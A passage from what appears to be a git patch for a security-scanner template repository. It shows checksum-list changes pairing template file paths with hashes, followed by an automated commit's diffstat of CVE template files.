-http/technologies/wordpress/plugins/woocommerce-payments.yaml:cc18d2c0a10a51cfe0ee4c4a11017547dc75c470 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:0182e458814d1a0ca3783ccb13316477a5c09dad -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:61ff0fdcc011dc336df3d5f26ee5224c6da9eb2f -http/technologies/wordpress/plugins/woocommerce-services.yaml:70062279bb6fa43c9c4d45f6d494cd2421a4d6a6 -http/technologies/wordpress/plugins/woocommerce.yaml:b3cc9b84e60008a53349cdfdd58713fd6a6cc2b3 -http/technologies/wordpress/plugins/wordfence.yaml:60a87b3e9b1e1b01c04026bdedbffc22394e14bf -http/technologies/wordpress/plugins/wordpress-importer.yaml:b72f0b998e1f9dc1de9a1d15048fd6f9aacee14d -http/technologies/wordpress/plugins/wordpress-seo.yaml:0399801a34d59ef1bc26145d3f3ceaebb9a4affa +http/technologies/wordpress/plugins/updraftplus.yaml:f00ed8130ddc466c1fff0751f9f1ea02c1215224 +http/technologies/wordpress/plugins/use-any-font.yaml:936461a290425396e53729af4436537ada73c78c +http/technologies/wordpress/plugins/user-role-editor.yaml:6020c44d937ddf580216c8073e66352d89fc307b +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:52d8b2b95edcdb38a8f4e31c3386908ad9e45cc0 +http/technologies/wordpress/plugins/w3-total-cache.yaml:0988033d30a03661a6ae1d1db0563327914fa4cc +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:90b9fc677f8267d1cfab0b1a29a7fab81771e4f7 +http/technologies/wordpress/plugins/webp-express.yaml:f5b22458ce41bb317f68345b799c2353c52d5cba +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:07261ddf366abc894c4f4c9fa455cab43c8a7672 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:1ca6af21fdb2be8cb74a2c03d48055f89881c85a +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:1e8aa36619511d5276152927d3ceac2e3f4f7757 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:054f17880690f8af72c085ebdcf983667fd8dca9 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:2139f97e765e94b9203c4f47ad6a3a1f5c0f8099 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:0076309ac7f0457a17d06ef5ce0333534f76e667 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:e40329f900cb5aa52f38797db4035aa7c2fa0aee +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:9657d66bca5d0a7725db3620ec34f121ce0bc91b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:57d900fdd5d2eec80605e6ac4fb04436416dc9f5 +http/technologies/wordpress/plugins/woocommerce-services.yaml:199f4926dda7452a696f69daeaef5b7fa6899831 +http/technologies/wordpress/plugins/woocommerce.yaml:44ae6e82273e82f0336ca6548ae726bc3dbe48cd +http/technologies/wordpress/plugins/wordfence.yaml:86ca8f643ec375fbfde869bb724820086e75c7d8 +http/technologies/wordpress/plugins/wordpress-importer.yaml:a14dc8898c7328c99b23d2f9338cc94b1e64c638 +http/technologies/wordpress/plugins/wordpress-seo.yaml:99a1dad5731d030ab73149f0c7f8ee79f4fe77e8 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:af23a901bf80d99add13c4487696bdd6922b1b0d -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ce5922d284bb857ed7afefd4ba6f4ca4140f5849 -http/technologies/wordpress/plugins/wp-file-manager.yaml:4525a86be3a222f8c1274789915c99250217d728 -http/technologies/wordpress/plugins/wp-google-maps.yaml:4ddc4a343ec43800fa1238f3a63116780bc42c54 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8c5166a4c4afea93360ba7b6d06d6dac3602e9c2 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:118d7cd631ab95da33df1a7bc6a6e1524345b1d4 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:22b3594e166bb0bc071febb617c305dcc8673dad -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f2d148d6bfa8d2fef2b4efa8a66b21ca9bdc150d -http/technologies/wordpress/plugins/wp-optimize.yaml:fdadc751abc7de67d698fc8a95e1b4c20b6c6cfc -http/technologies/wordpress/plugins/wp-pagenavi.yaml:263c292280c818616ed5756870fb62c6773aaca0 -http/technologies/wordpress/plugins/wp-reset.yaml:72b0d50aaf800e5ccbf53ffc1888fd2f95acbd92 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4a14cad24c210b39deedd0e716565f103a6654f4 -http/technologies/wordpress/plugins/wp-rollback.yaml:c907566b208ca943668d452595bb432586fec1ec -http/technologies/wordpress/plugins/wp-seopress.yaml:8ee93a7434528fcab1a00e1ee304bf1611ac01de -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7727babe8e95a25f88c4624d1483681a044ff339 -http/technologies/wordpress/plugins/wp-smushit.yaml:93967a45ff8e1a3f66f6cebdd4237a60711a9dc2 -http/technologies/wordpress/plugins/wp-statistics.yaml:d1a9df96962c6e799ae8c62a7f1dc199f4971273 -http/technologies/wordpress/plugins/wp-super-cache.yaml:44597dbe9a7e287c20f07ea650f7d8aa8a02dcd6 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:d59c81c9d5003950cb34bb9673b6dd9f0eb7278c -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:0b3a728d5d83fc79d808e3e936b1ccd487aa1999 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:1aa26f290690a5e263bde467f8fea175fcf86ee4 -http/technologies/wordpress/plugins/wpforms-lite.yaml:b68ef67b12d7b5a48fd830c60743d7621055a872 -http/technologies/wordpress/plugins/wps-hide-login.yaml:88a07085b69fa6550b2c18ddbade0bf6bb2cdac1 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:7cbc8389efe9e2e92b7c113eceac8482ac8e8a42 +http/technologies/wordpress/plugins/worker.yaml:5351f368b3701eccbd509b09e8cb4ff108c0ee08 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:5cc9e7cdc95527313b09c1cebfc1c2089318594b +http/technologies/wordpress/plugins/wp-file-manager.yaml:a93b555991b9d69fb4b526f597e277982acaa99c +http/technologies/wordpress/plugins/wp-google-maps.yaml:3b7bd2dd89c7d57be23ec84cf2614104811ef51a +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8f33b0a6933b81c0f64e27f9a6682e8c6d1cc408 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:732b860e9770670d2c30eecc0f339902d0ac7101 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:24cbcdb2de17538519246e5f97922edf0e2d0644 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:4bbf14431facc5e0a3ddd5ee9780fa8f26668942 +http/technologies/wordpress/plugins/wp-optimize.yaml:edd3a703e65f369cd79405d1e4d26eb2190fc469 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:f092ff579266f6ded8ef5b594e63bde1a76d8fb2 +http/technologies/wordpress/plugins/wp-reset.yaml:b7c3de40ea3e6a526f44f586aa77b8f295d1f9e1 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:fe581c1bc31736d35277712f3cceb0aea90b6c15 +http/technologies/wordpress/plugins/wp-rollback.yaml:464b4b0289f36114a71d9bbf7bca444e707096ba +http/technologies/wordpress/plugins/wp-seopress.yaml:703dde5b3a7244e62d1648940a9227138397b982 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:d2cef0ed466c8df243c91ca4d54af55564ca7091 +http/technologies/wordpress/plugins/wp-smushit.yaml:1d2919a74472f7ba5663cbb7907ebc60fe9e7ab6 +http/technologies/wordpress/plugins/wp-statistics.yaml:72e7f4fe33dc6c1d7ba285051c83913f05eb0cf6 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0f7c7f17361c213ecfc368a0eaf48fe59c6ceab0 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:d16c218aeee344f23a4503293045d18a631641fb +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:c3451ba1ff0805149e639f38c0f82dbbfa6cd0ca +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:815bd633d2cdc559c923a8b1a81fc5fcdb75d329 +http/technologies/wordpress/plugins/wpforms-lite.yaml:434187d181c8c836c95629b0926f6dbc347086a4 +http/technologies/wordpress/plugins/wps-hide-login.yaml:ff6e92e1aa7b2f1b508da864cf0c89595e4e8c15 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:0a6ba41eead68683d9db298261769ef1a9143bd0 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e162b2f96effc325b1b831f494c09f7aa6223715 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d72007580aeb0738ff571906606066fa551063c7 http/technologies/wordpress-detect.yaml:937cc05d463b4e9d17c09fba39056fdbdb187056 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -6572,7 +6572,7 @@ http/token-spray/google-timezone.yaml:810190cf9c433c43ce6f551f29e6767f15f7412f http/token-spray/googlet-extsearchplaces.yaml:b136a266a5998ad603817d34d8bb0ce9599a9401 http/vulnerabilities/74cms/74cms-weixin-sqli.yaml:2d87bdfcd0dd6b777635096b6ff8ec5d1ca69559 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:496cc34d7d9b138c78b6a8779d8da8cb498b89a1 -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:888d647c16ed739cae18ea7d86c0ce0ef8604f4c +http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:ccd5000d301879189fdebc1ae7fcbdace249d056 http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:0a7ce14a72d4914f195dc3b2ed413f44bdc22ec5 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:5e7e6e37c58c3416c48b2c4904c0509af3def15e http/vulnerabilities/apache/apache-solr-file-read.yaml:0a4ed215fe43e7fb4f0be607787a637a80773bb0 @@ -6778,7 +6778,7 @@ http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be http/vulnerabilities/other/easyimage-downphp-lfi.yaml:3fa0b55a93225ea14da76b59c62b982057714ae3 -http/vulnerabilities/other/ecology-oa-file-sqli.yaml:8bbdebfe849fc09d48edcc23129f4437a039377f +http/vulnerabilities/other/ecology-oa-file-sqli.yaml:ed37d9b6cdb198b6ecd63947056609b791e8bb39 http/vulnerabilities/other/ecshop-sqli.yaml:665c8e1678762398162f054d117500affe7d4e48 http/vulnerabilities/other/ecsimagingpacs-rce.yaml:225ae97e89c774cfaff636a3f7f7115e1fd36ecf http/vulnerabilities/other/eibiz-lfi.yaml:cbf9aa62b6d93b0b8cc1ab70dd1fa1b7da422c9e @@ -7390,7 +7390,7 @@ network/cves/2020/CVE-2020-7247.yaml:8c4d9f68149de1747d403340b639460de856f7eb network/cves/2021/CVE-2021-44521.yaml:98c0ae75aaaf785fdc3fb6952027b509959571b5 network/cves/2022/CVE-2022-0543.yaml:46b2b79d679b0223ad99a49b92135ac7f59ef6ce network/cves/2022/CVE-2022-24706.yaml:0c5215095601865701d6a48ee18da810279ce48e -network/cves/2022/CVE-2022-31793.yaml:4ab8e096a9ada05f47dd8fce3e392a47c81146c8 +network/cves/2022/CVE-2022-31793.yaml:b75a436cf78a7fde9ef23cd83cf8f573c161023b network/cves/2023/CVE-2023-33246.yaml:28332ee6138694c0472a08cd9b271de51dd32dbd network/default-login/ftp-anonymous-login.yaml:da3402a791529b5521e14fceafe0f0084bb4c9d2 network/default-login/ftp-weak-credentials.yaml:1405ce162895ba2dcdaa7277e687a28a2ff40ce7 @@ -7519,7 +7519,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:6250cddead3796ecd29415dacc18f64eb2716998 +templates-checksum.txt:69775edda1aa9fb2718b1c7f07ed93ff83294d4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 14d3d7d36525922d5a96356ef32f61a061d4e6ee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 15:51:18 +0000 Subject: [PATCH 32/36] TemplateMan Update [Fri Nov 3 15:51:18 UTC 2023] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 5 +++-- http/cves/2001/CVE-2001-0537.yaml | 5 +++-- http/cves/2002/CVE-2002-1131.yaml | 5 +++-- http/cves/2004/CVE-2004-0519.yaml | 5 +++-- http/cves/2004/CVE-2004-1965.yaml | 5 +++-- http/cves/2005/CVE-2005-2428.yaml | 5 +++-- http/cves/2005/CVE-2005-3344.yaml | 5 +++-- http/cves/2005/CVE-2005-3634.yaml | 5 +++-- http/cves/2005/CVE-2005-4385.yaml | 5 +++-- http/cves/2006/CVE-2006-1681.yaml | 5 +++-- http/cves/2006/CVE-2006-2842.yaml | 5 +++-- http/cves/2007/CVE-2007-0885.yaml | 5 +++-- http/cves/2007/CVE-2007-4504.yaml | 5 +++-- http/cves/2007/CVE-2007-4556.yaml | 5 +++-- http/cves/2007/CVE-2007-5728.yaml | 5 +++-- http/cves/2008/CVE-2008-1059.yaml | 5 +++-- http/cves/2008/CVE-2008-1061.yaml | 5 +++-- http/cves/2008/CVE-2008-1547.yaml | 7 ++++--- http/cves/2008/CVE-2008-2398.yaml | 5 +++-- http/cves/2008/CVE-2008-2650.yaml | 5 +++-- http/cves/2008/CVE-2008-4668.yaml | 5 +++-- http/cves/2008/CVE-2008-4764.yaml | 5 +++-- http/cves/2008/CVE-2008-5587.yaml | 5 +++-- http/cves/2008/CVE-2008-6080.yaml | 5 +++-- http/cves/2008/CVE-2008-6172.yaml | 5 +++-- http/cves/2008/CVE-2008-6222.yaml | 5 +++-- http/cves/2008/CVE-2008-6465.yaml | 5 +++-- http/cves/2008/CVE-2008-6668.yaml | 5 +++-- http/cves/2008/CVE-2008-6982.yaml | 5 +++-- http/cves/2008/CVE-2008-7269.yaml | 5 +++-- http/cves/2009/CVE-2009-0347.yaml | 5 +++-- http/cves/2009/CVE-2009-0545.yaml | 4 ++-- http/cves/2009/CVE-2009-0932.yaml | 5 +++-- http/cves/2009/CVE-2009-1151.yaml | 5 +++-- http/cves/2009/CVE-2009-1496.yaml | 5 +++-- http/cves/2009/CVE-2009-1558.yaml | 5 +++-- http/cves/2009/CVE-2009-1872.yaml | 5 +++-- http/cves/2009/CVE-2009-2015.yaml | 5 +++-- http/cves/2009/CVE-2009-2100.yaml | 5 +++-- http/cves/2009/CVE-2009-3053.yaml | 5 +++-- http/cves/2009/CVE-2009-3318.yaml | 5 +++-- http/cves/2009/CVE-2009-4202.yaml | 5 +++-- http/cves/2009/CVE-2009-4223.yaml | 5 +++-- http/cves/2009/CVE-2009-4679.yaml | 5 +++-- http/cves/2009/CVE-2009-5020.yaml | 5 +++-- http/cves/2009/CVE-2009-5114.yaml | 5 +++-- http/cves/2010/CVE-2010-0157.yaml | 5 +++-- http/cves/2010/CVE-2010-0219.yaml | 3 ++- http/cves/2010/CVE-2010-0467.yaml | 5 +++-- http/cves/2010/CVE-2010-0696.yaml | 5 +++-- http/cves/2010/CVE-2010-0759.yaml | 5 +++-- http/cves/2010/CVE-2010-0942.yaml | 5 +++-- http/cves/2010/CVE-2010-0943.yaml | 5 +++-- http/cves/2010/CVE-2010-0944.yaml | 5 +++-- http/cves/2010/CVE-2010-0972.yaml | 5 +++-- http/cves/2010/CVE-2010-0982.yaml | 5 +++-- http/cves/2010/CVE-2010-0985.yaml | 5 +++-- http/cves/2010/CVE-2010-1056.yaml | 5 +++-- http/cves/2010/CVE-2010-1081.yaml | 5 +++-- http/cves/2010/CVE-2010-1217.yaml | 5 +++-- http/cves/2010/CVE-2010-1219.yaml | 5 +++-- http/cves/2010/CVE-2010-1302.yaml | 5 +++-- http/cves/2010/CVE-2010-1304.yaml | 5 +++-- http/cves/2010/CVE-2010-1305.yaml | 5 +++-- http/cves/2010/CVE-2010-1306.yaml | 5 +++-- http/cves/2010/CVE-2010-1307.yaml | 5 +++-- http/cves/2010/CVE-2010-1308.yaml | 5 +++-- http/cves/2010/CVE-2010-1312.yaml | 5 +++-- http/cves/2010/CVE-2010-1313.yaml | 5 +++-- http/cves/2010/CVE-2010-1314.yaml | 5 +++-- http/cves/2010/CVE-2010-1315.yaml | 5 +++-- http/cves/2010/CVE-2010-1340.yaml | 5 +++-- http/cves/2010/CVE-2010-1345.yaml | 5 +++-- http/cves/2010/CVE-2010-1352.yaml | 5 +++-- http/cves/2010/CVE-2010-1353.yaml | 5 +++-- http/cves/2010/CVE-2010-1354.yaml | 5 +++-- http/cves/2010/CVE-2010-1429.yaml | 5 +++-- http/cves/2010/CVE-2010-1461.yaml | 5 +++-- http/cves/2010/CVE-2010-1469.yaml | 5 +++-- http/cves/2010/CVE-2010-1470.yaml | 5 +++-- http/cves/2010/CVE-2010-1471.yaml | 5 +++-- http/cves/2010/CVE-2010-1472.yaml | 5 +++-- http/cves/2010/CVE-2010-1473.yaml | 5 +++-- http/cves/2010/CVE-2010-1474.yaml | 5 +++-- http/cves/2010/CVE-2010-1475.yaml | 5 +++-- http/cves/2010/CVE-2010-1476.yaml | 5 +++-- http/cves/2010/CVE-2010-1478.yaml | 5 +++-- http/cves/2010/CVE-2010-1491.yaml | 5 +++-- http/cves/2010/CVE-2010-1494.yaml | 5 +++-- http/cves/2010/CVE-2010-1495.yaml | 5 +++-- http/cves/2010/CVE-2010-1531.yaml | 5 +++-- http/cves/2010/CVE-2010-1532.yaml | 5 +++-- http/cves/2010/CVE-2010-1533.yaml | 5 +++-- http/cves/2010/CVE-2010-1534.yaml | 5 +++-- http/cves/2010/CVE-2010-1535.yaml | 5 +++-- http/cves/2010/CVE-2010-1540.yaml | 5 +++-- http/cves/2010/CVE-2010-1586.yaml | 5 +++-- http/cves/2010/CVE-2010-1601.yaml | 5 +++-- http/cves/2010/CVE-2010-1602.yaml | 5 +++-- http/cves/2010/CVE-2010-1603.yaml | 5 +++-- http/cves/2010/CVE-2010-1607.yaml | 5 +++-- http/cves/2010/CVE-2010-1653.yaml | 5 +++-- http/cves/2010/CVE-2010-1657.yaml | 5 +++-- http/cves/2010/CVE-2010-1658.yaml | 5 +++-- http/cves/2010/CVE-2010-1659.yaml | 5 +++-- http/cves/2010/CVE-2010-1714.yaml | 5 +++-- http/cves/2010/CVE-2010-1715.yaml | 5 +++-- http/cves/2010/CVE-2010-1717.yaml | 5 +++-- http/cves/2010/CVE-2010-1718.yaml | 5 +++-- http/cves/2010/CVE-2010-1719.yaml | 5 +++-- http/cves/2010/CVE-2010-1722.yaml | 5 +++-- http/cves/2010/CVE-2010-1723.yaml | 5 +++-- http/cves/2010/CVE-2010-1858.yaml | 5 +++-- http/cves/2010/CVE-2010-1870.yaml | 5 +++-- http/cves/2010/CVE-2010-1875.yaml | 5 +++-- http/cves/2010/CVE-2010-1878.yaml | 5 +++-- http/cves/2010/CVE-2010-1952.yaml | 5 +++-- http/cves/2010/CVE-2010-1953.yaml | 5 +++-- http/cves/2010/CVE-2010-1954.yaml | 5 +++-- http/cves/2010/CVE-2010-1955.yaml | 5 +++-- http/cves/2010/CVE-2010-1956.yaml | 5 +++-- http/cves/2010/CVE-2010-1957.yaml | 5 +++-- http/cves/2010/CVE-2010-1977.yaml | 5 +++-- http/cves/2010/CVE-2010-1979.yaml | 5 +++-- http/cves/2010/CVE-2010-1980.yaml | 5 +++-- http/cves/2010/CVE-2010-1981.yaml | 5 +++-- http/cves/2010/CVE-2010-1982.yaml | 5 +++-- http/cves/2010/CVE-2010-1983.yaml | 5 +++-- http/cves/2010/CVE-2010-2033.yaml | 5 +++-- http/cves/2010/CVE-2010-2034.yaml | 5 +++-- http/cves/2010/CVE-2010-2035.yaml | 5 +++-- http/cves/2010/CVE-2010-2036.yaml | 5 +++-- http/cves/2010/CVE-2010-2037.yaml | 5 +++-- http/cves/2010/CVE-2010-2045.yaml | 5 +++-- http/cves/2010/CVE-2010-2050.yaml | 5 +++-- http/cves/2010/CVE-2010-2122.yaml | 5 +++-- http/cves/2010/CVE-2010-2128.yaml | 5 +++-- http/cves/2010/CVE-2010-2259.yaml | 5 +++-- http/cves/2010/CVE-2010-2307.yaml | 5 +++-- http/cves/2010/CVE-2010-2507.yaml | 5 +++-- http/cves/2010/CVE-2010-2680.yaml | 5 +++-- http/cves/2010/CVE-2010-2682.yaml | 5 +++-- http/cves/2010/CVE-2010-2857.yaml | 5 +++-- http/cves/2010/CVE-2010-2918.yaml | 5 +++-- http/cves/2010/CVE-2010-2920.yaml | 5 +++-- http/cves/2010/CVE-2010-3203.yaml | 5 +++-- http/cves/2010/CVE-2010-3426.yaml | 5 +++-- http/cves/2010/CVE-2010-4231.yaml | 5 +++-- http/cves/2010/CVE-2010-4239.yaml | 5 +++-- http/cves/2010/CVE-2010-4282.yaml | 5 +++-- http/cves/2010/CVE-2010-4617.yaml | 5 +++-- http/cves/2010/CVE-2010-4719.yaml | 5 +++-- http/cves/2010/CVE-2010-4769.yaml | 5 +++-- http/cves/2010/CVE-2010-4977.yaml | 5 +++-- http/cves/2010/CVE-2010-5028.yaml | 5 +++-- http/cves/2010/CVE-2010-5278.yaml | 5 +++-- http/cves/2010/CVE-2010-5286.yaml | 5 +++-- http/cves/2011/CVE-2011-0049.yaml | 5 +++-- http/cves/2011/CVE-2011-1669.yaml | 5 +++-- http/cves/2011/CVE-2011-2744.yaml | 5 +++-- http/cves/2011/CVE-2011-2780.yaml | 5 +++-- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 5 +++-- http/cves/2011/CVE-2011-4618.yaml | 5 +++-- http/cves/2011/CVE-2011-4624.yaml | 5 +++-- http/cves/2011/CVE-2011-4804.yaml | 5 +++-- http/cves/2011/CVE-2011-4926.yaml | 5 +++-- http/cves/2011/CVE-2011-5106.yaml | 5 +++-- http/cves/2011/CVE-2011-5107.yaml | 5 +++-- http/cves/2011/CVE-2011-5179.yaml | 5 +++-- http/cves/2011/CVE-2011-5181.yaml | 5 +++-- http/cves/2011/CVE-2011-5252.yaml | 5 +++-- http/cves/2011/CVE-2011-5265.yaml | 5 +++-- http/cves/2012/CVE-2012-0392.yaml | 5 +++-- http/cves/2012/CVE-2012-0394.yaml | 5 +++-- http/cves/2012/CVE-2012-0896.yaml | 5 +++-- http/cves/2012/CVE-2012-0901.yaml | 5 +++-- http/cves/2012/CVE-2012-0981.yaml | 5 +++-- http/cves/2012/CVE-2012-0991.yaml | 5 +++-- http/cves/2012/CVE-2012-0996.yaml | 5 +++-- http/cves/2012/CVE-2012-1226.yaml | 5 +++-- http/cves/2012/CVE-2012-1823.yaml | 3 ++- http/cves/2012/CVE-2012-1835.yaml | 5 +++-- http/cves/2012/CVE-2012-2371.yaml | 5 +++-- http/cves/2012/CVE-2012-3153.yaml | 5 +++-- http/cves/2012/CVE-2012-4032.yaml | 5 +++-- http/cves/2012/CVE-2012-4242.yaml | 5 +++-- http/cves/2012/CVE-2012-4253.yaml | 5 +++-- http/cves/2012/CVE-2012-4273.yaml | 5 +++-- http/cves/2012/CVE-2012-4547.yaml | 5 +++-- http/cves/2012/CVE-2012-4768.yaml | 5 +++-- http/cves/2012/CVE-2012-4878.yaml | 5 +++-- http/cves/2012/CVE-2012-4889.yaml | 5 +++-- http/cves/2012/CVE-2012-4940.yaml | 5 +++-- http/cves/2012/CVE-2012-4982.yaml | 5 +++-- http/cves/2012/CVE-2012-5321.yaml | 5 +++-- http/cves/2012/CVE-2012-5913.yaml | 5 +++-- http/cves/2012/CVE-2012-6499.yaml | 5 +++-- http/cves/2013/CVE-2013-1965.yaml | 5 +++-- http/cves/2013/CVE-2013-2287.yaml | 5 +++-- http/cves/2013/CVE-2013-2621.yaml | 5 +++-- http/cves/2013/CVE-2013-3526.yaml | 5 +++-- http/cves/2013/CVE-2013-3827.yaml | 5 +++-- http/cves/2013/CVE-2013-4117.yaml | 5 +++-- http/cves/2013/CVE-2013-4625.yaml | 5 +++-- http/cves/2013/CVE-2013-5528.yaml | 5 +++-- http/cves/2013/CVE-2013-5979.yaml | 5 +++-- http/cves/2013/CVE-2013-6281.yaml | 5 +++-- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 5 +++-- http/cves/2013/CVE-2013-7285.yaml | 5 +++-- http/cves/2014/CVE-2014-10037.yaml | 7 ++++--- http/cves/2014/CVE-2014-1203.yaml | 5 +++-- http/cves/2014/CVE-2014-2321.yaml | 5 +++-- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 5 +++-- http/cves/2014/CVE-2014-2908.yaml | 5 +++-- http/cves/2014/CVE-2014-2962.yaml | 5 +++-- http/cves/2014/CVE-2014-3120.yaml | 5 +++-- http/cves/2014/CVE-2014-3206.yaml | 5 +++-- http/cves/2014/CVE-2014-3744.yaml | 5 +++-- http/cves/2014/CVE-2014-4210.yaml | 5 +++-- http/cves/2014/CVE-2014-4513.yaml | 5 +++-- http/cves/2014/CVE-2014-4535.yaml | 5 +++-- http/cves/2014/CVE-2014-4536.yaml | 5 +++-- http/cves/2014/CVE-2014-4539.yaml | 5 +++-- http/cves/2014/CVE-2014-4544.yaml | 5 +++-- http/cves/2014/CVE-2014-4550.yaml | 5 +++-- http/cves/2014/CVE-2014-4558.yaml | 5 +++-- http/cves/2014/CVE-2014-4561.yaml | 5 +++-- http/cves/2014/CVE-2014-4592.yaml | 5 +++-- http/cves/2014/CVE-2014-4940.yaml | 5 +++-- http/cves/2014/CVE-2014-4942.yaml | 5 +++-- http/cves/2014/CVE-2014-5111.yaml | 5 +++-- http/cves/2014/CVE-2014-5258.yaml | 5 +++-- http/cves/2014/CVE-2014-5368.yaml | 5 +++-- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 5 +++-- http/cves/2014/CVE-2014-8676.yaml | 5 +++-- http/cves/2014/CVE-2014-8682.yaml | 5 +++-- http/cves/2014/CVE-2014-8799.yaml | 5 +++-- http/cves/2014/CVE-2014-9094.yaml | 5 +++-- http/cves/2014/CVE-2014-9119.yaml | 5 +++-- http/cves/2014/CVE-2014-9180.yaml | 5 +++-- http/cves/2014/CVE-2014-9444.yaml | 5 +++-- http/cves/2014/CVE-2014-9606.yaml | 5 +++-- http/cves/2014/CVE-2014-9607.yaml | 5 +++-- http/cves/2014/CVE-2014-9608.yaml | 5 +++-- http/cves/2014/CVE-2014-9609.yaml | 5 +++-- http/cves/2014/CVE-2014-9614.yaml | 5 +++-- http/cves/2014/CVE-2014-9615.yaml | 5 +++-- http/cves/2014/CVE-2014-9617.yaml | 5 +++-- http/cves/2014/CVE-2014-9618.yaml | 5 +++-- http/cves/2015/CVE-2015-0554.yaml | 5 +++-- http/cves/2015/CVE-2015-1000005.yaml | 5 +++-- http/cves/2015/CVE-2015-1000010.yaml | 5 +++-- http/cves/2015/CVE-2015-1000012.yaml | 5 +++-- http/cves/2015/CVE-2015-1427.yaml | 5 +++-- http/cves/2015/CVE-2015-1503.yaml | 5 +++-- http/cves/2015/CVE-2015-1579.yaml | 5 +++-- http/cves/2015/CVE-2015-1880.yaml | 5 +++-- http/cves/2015/CVE-2015-2067.yaml | 5 +++-- http/cves/2015/CVE-2015-2068.yaml | 5 +++-- http/cves/2015/CVE-2015-2080.yaml | 5 +++-- http/cves/2015/CVE-2015-2166.yaml | 5 +++-- http/cves/2015/CVE-2015-2196.yaml | 5 +++-- http/cves/2015/CVE-2015-2755.yaml | 5 +++-- http/cves/2015/CVE-2015-2807.yaml | 5 +++-- http/cves/2015/CVE-2015-2863.yaml | 5 +++-- http/cves/2015/CVE-2015-2996.yaml | 5 +++-- http/cves/2015/CVE-2015-3035.yaml | 5 +++-- http/cves/2015/CVE-2015-3224.yaml | 5 +++-- http/cves/2015/CVE-2015-3337.yaml | 5 +++-- http/cves/2015/CVE-2015-3648.yaml | 5 +++-- http/cves/2015/CVE-2015-3897.yaml | 5 +++-- http/cves/2015/CVE-2015-4050.yaml | 5 +++-- http/cves/2015/CVE-2015-4062.yaml | 5 +++-- http/cves/2015/CVE-2015-4063.yaml | 5 +++-- http/cves/2015/CVE-2015-4074.yaml | 5 +++-- http/cves/2015/CVE-2015-4127.yaml | 5 +++-- http/cves/2015/CVE-2015-4414.yaml | 5 +++-- http/cves/2015/CVE-2015-4632.yaml | 5 +++-- http/cves/2015/CVE-2015-4666.yaml | 5 +++-- http/cves/2015/CVE-2015-4668.yaml | 5 +++-- 